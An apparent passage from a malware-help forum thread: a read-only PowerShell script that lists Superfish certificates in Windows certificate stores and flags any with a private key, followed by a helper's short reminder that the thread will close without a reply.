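A scripted version of the certmgr.msc walk-through in the post above, added here as an example and not part of Jo's instructions or any BleepingComputer tool. It assumes Windows PowerShell 3 or later with the Cert: drive, only reports what it finds (it deletes nothing), and additionally flags whether the private key of a matching root is present on the machine.

```powershell
# Added example: scripted equivalent of the certmgr.msc check in the post above.
# Reports only; nothing is deleted. Assumes Windows PowerShell 3+ with the Cert: drive.

$Pattern = 'Superfish'   # the name the post tells the user to look for

# Root and intermediate stores for both the machine and the current user.
$Stores = @(
    'Cert:\LocalMachine\Root',
    'Cert:\LocalMachine\CA',
    'Cert:\CurrentUser\Root',
    'Cert:\CurrentUser\CA'
)

$Hits = foreach ($Store in $Stores) {
    if (-not (Test-Path $Store)) { continue }
    Get-ChildItem -Path $Store |
        Where-Object { $_.Subject -match $Pattern -or $_.Issuer -match $Pattern } |
        ForEach-Object {
            [PSCustomObject]@{
                Store         = $Store
                Subject       = $_.Subject
                Thumbprint    = $_.Thumbprint
                NotAfter      = $_.NotAfter
                # A trusted root whose private key sits on this machine is the dangerous
                # case: any software here could issue certificates the system will trust.
                HasPrivateKey = $_.HasPrivateKey
            }
        }
}

if ($Hits) {
    $Hits | Format-Table -AutoSize
    # One certificate-store path per finding, for review in certmgr.msc.
    $Hits | ForEach-Object { "Review: $($_.Store)\$($_.Thumbprint)" }
} else {
    "No certificates matching '$Pattern' found in $($Stores.Count) stores."
}
```

Firefox and Thunderbird keep their own certificate database, which this script does not read; that is why the post lists separate steps for those programs.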


#15 Jo*


  • Malware Response Team
  • 3,425 posts
  • Gender:Male
  • Location:Germany

Posted 04 May 2016 - 03:50 AM

Hi,

It has been several days since I sent my last set of instructions to help with your computer problem.

Please let me know if you are having problems and still need help.

Note: Thread will be closed if no response after 3 days.





